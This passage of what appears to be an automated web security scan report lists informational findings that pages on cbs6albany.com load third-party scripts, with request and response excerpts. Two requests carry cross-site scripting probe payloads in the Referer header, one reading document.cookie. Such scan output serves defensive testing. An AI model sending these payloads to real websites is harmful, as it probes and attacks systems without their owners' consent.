<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.800. http://www.cbs6albany.com/sections/schoolclosures/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/schoolclosures/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/schoolclosures/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:21:15 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:31:15 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 37793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=life%7Ceducation%7Cschools&amp;ghier=life%7Ceducation%7Cschools&amp;us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.801. http://www.cbs6albany.com/sections/schoolwatch/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/schoolwatch/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/schoolwatch/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:31 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:31 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=life%7Ceducation&amp;ghier=life%7Ceducation&amp;us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.802. http://www.cbs6albany.com/sections/sitemap/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/sitemap/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/sitemap/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:18:40 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:28:40 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 40015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=custsvc&amp;ghier=custsvc&amp;us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.803. http://www.cbs6albany.com/sections/sp-alerts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/sp-alerts/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/sp-alerts/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:21:05 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:31:05 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 37038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=special&amp;ghier=special&amp;us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.804. http://www.cbs6albany.com/sections/thirdParty/iframe_footer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/thirdParty/iframe_footer/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/thirdParty/iframe_footer/ HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:37:28 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Fri, 28 Jan 2011 17:47:28 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 7435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.805. http://www.cbs6albany.com/sections/thirdParty/iframe_header/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/thirdParty/iframe_header/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sections/thirdParty/iframe_header/?taxonomy=classified&cname=section&shier=classified&ghier=classified&trackbyurl=wrgb&usetitle=true&domain=cbs6albany.oodle.com HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://cbs6albany.oodle.com/?2ba1c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0fdede783fa=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1298828234584%26vn%3D1; __qca=P0-387650238-1296236241942; s_nr=1296236252424; ebPanelFrequency_.www.cbs6albany.com=4189023%3A2%3A1%3A1296322656115; ebNewBandWidth_.www.cbs6albany.com=2030%3A1296236256165; s_cc=true; s_lastvisit=1296308278321; fi_dslv=Less%20than%201%20day; s_vnum_w=1296367200803%26vn%3D2; s_vnum_m=1296540000804%26vn%3D2; s_sq=%5B%5BB%5D%5D; Zvents=jblyxxj3qv; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:27:32 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 14:37:32 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 5940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=cbs6albany.oodle.com&amp;ctype=&amp;cname=section&amp;shier=classified&amp;ghier=classified&amp;trackbyurl=wrgb&amp;usetitle=true&amp;us=anonymous"></script>
...[SNIP]...

18.806. http://www.cbs6albany.com/sections/traffic-events/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/traffic-events/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/traffic-events/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:20:32 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:30:32 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 41994


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=traffic&amp;ghier=traffic&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.807. http://www.cbs6albany.com/sections/traffic/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/traffic/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/traffic/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:20:07 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:30:07 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 28890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=traffic&amp;ghier=traffic&amp;us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.808. http://www.cbs6albany.com/sections/tvlistings/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/tvlistings/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/tvlistings/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:20:33 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:30:33 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=entertainment%7Ctv&amp;ghier=entertainment%7Ctv&amp;us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.809. http://www.cbs6albany.com/sections/videocopies/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/videocopies/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/videocopies/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:50 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:33:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42187


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=custsvc&amp;ghier=custsvc&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.810. http://www.cbs6albany.com/sections/weather/7day/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/weather/7day/

Issue detail

The response dynamically includes scripts from the following other domains (see the response excerpt below): common.onset.freedom.com, edge.quantserve.com, an.tacoda.net

Request

GET /sections/weather/7day/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:18:51 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:28:51 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=weather%7Cforecast&amp;ghier=weather%7Cforecast&amp;us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.811. http://www.cbs6albany.com/sections/web-links/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/web-links/

Issue detail

The response dynamically includes scripts from the following other domains (see the response excerpt below): common.onset.freedom.com, edge.quantserve.com, an.tacoda.net

Request

GET /sections/web-links/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:18 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:18 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59475


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=Web Links&amp;ghier=community%7Clinks&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.812. http://www.cbs6albany.com/sections/wrgb-talent/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/wrgb-talent/

Issue detail

The response dynamically includes scripts from the following other domains (see the response excerpt below): common.onset.freedom.com, edge.quantserve.com, an.tacoda.net

Request

GET /sections/wrgb-talent/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:16 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:33:16 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 26962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=custsvc&amp;ghier=custsvc&amp;us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.813. http://www.cbs6albany.com/sections/you-paid-for-it/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/you-paid-for-it/

Issue detail

The response dynamically includes scripts from the following other domains (see the response excerpt below): common.onset.freedom.com, edge.quantserve.com, an.tacoda.net

Request

GET /sections/you-paid-for-it/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:23 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:23 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 70814


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=You Paid For It&amp;ghier=marketplace&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.814. http://www.collegeanduniversity.net/herald/

Summary

Severity:   Information
Confidence:   Certain
